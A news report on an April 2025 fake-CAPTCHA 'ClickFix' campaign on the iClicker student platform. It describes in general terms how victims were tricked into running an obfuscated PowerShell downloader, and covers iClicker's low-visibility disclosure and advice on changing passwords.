A popular student engagement platform, iClicker, has been the target of a sophisticated cyberattack that tricked students and instructors into unknowingly installing malware on their devices.
The attack, which occurred between April 12 and April 16, 2025, exploited a fake CAPTCHA prompt on the iClicker website (iClicker.com), a digital classroom tool used by 5,000 instructors and 7 million students across numerous U.S. colleges and universities.
According to a security alert issued by the University of Michigan’s Safe Computing team, the compromised website displayed a fraudulent “I’m not a robot” CAPTCHA.
Unsuspecting users who clicked on this prompt inadvertently triggered a “ClickFix” social engineering attack.
This technique silently copied a malicious PowerShell script to the Windows clipboard. The fake CAPTCHA then instructed users to open the Windows Run dialog, paste the script, and execute it by pressing Enter, supposedly to verify their humanity.
A Reddit user later analyzed the executed PowerShell command on the Any.Run sandbox platform, revealing a heavily obfuscated payload.
Upon execution, this script would connect to a remote server at [.]14:8080 to download and execute a second, more specific PowerShell script.
Worryingly, the nature of the final malware payload remains unclear, as the downloaded script varied depending on the visitor.
The University of Michigan warned that for targeted individuals, the malware granted the attacker full access to the infected device.
In contrast, non-targeted visitors, such as malware analysis sandboxes, were served a legitimate Microsoft Visual C++ Redistributable, a tactic likely designed to evade detection.
This incident highlights the growing prevalence of ClickFix attacks, a social engineering technique that has been observed in various malware campaigns masquerading as Cloudflare CAPTCHAs, Google Meet prompts, and web browser errors.
Cybersecurity experts believe that this particular attack likely aimed to distribute an infostealer. Such malware is capable of stealing sensitive data, including browser cookies, login credentials, passwords, credit card information, and browsing history from popular web browsers.
It can also target cryptocurrency wallets and sensitive text files.
The stolen data could be leveraged for further malicious activities, including large-scale data breaches and ransomware attacks. Given the target demographic of college students and instructors, a potential motive could be the theft of university credentials to facilitate attacks on college networks.
BleepingComputer discovered a quietly published security bulletin on iClicker’s website on May 6. The company included a <meta name=’robots’ content=’noindex, nofollow’ /> tag in the page’s HTML, effectively preventing search engines from indexing the bulletin and making it significantly harder for users to find information about the security incident.
The security bulletin stated, “We recently resolved an incident affecting the iClicker landing page (iClicker.com). Importantly, no iClicker data, apps, or operations were impacted and the identified vulnerability on the iClicker landing page has been resolved.”
iClicker described the incident as an “unrelated third party” placing a false CAPTCHA on their landing page before users logged in, aiming to trick users into clicking it, similar to phishing emails.
Out of caution, iClicker advised any faculty or student who encountered and clicked on the fake CAPTCHA between April 12 and April 16 to run security software to ensure their devices are protected.
Users who accessed iClicker.com during the affected period and followed the fake CAPTCHA instructions are strongly urged to immediately change their iClicker password.
If they executed the pasted command, they should change all passwords stored on their computer to unique, strong passwords for every website, recommending the use of a password manager like BitWarden or 1Password.
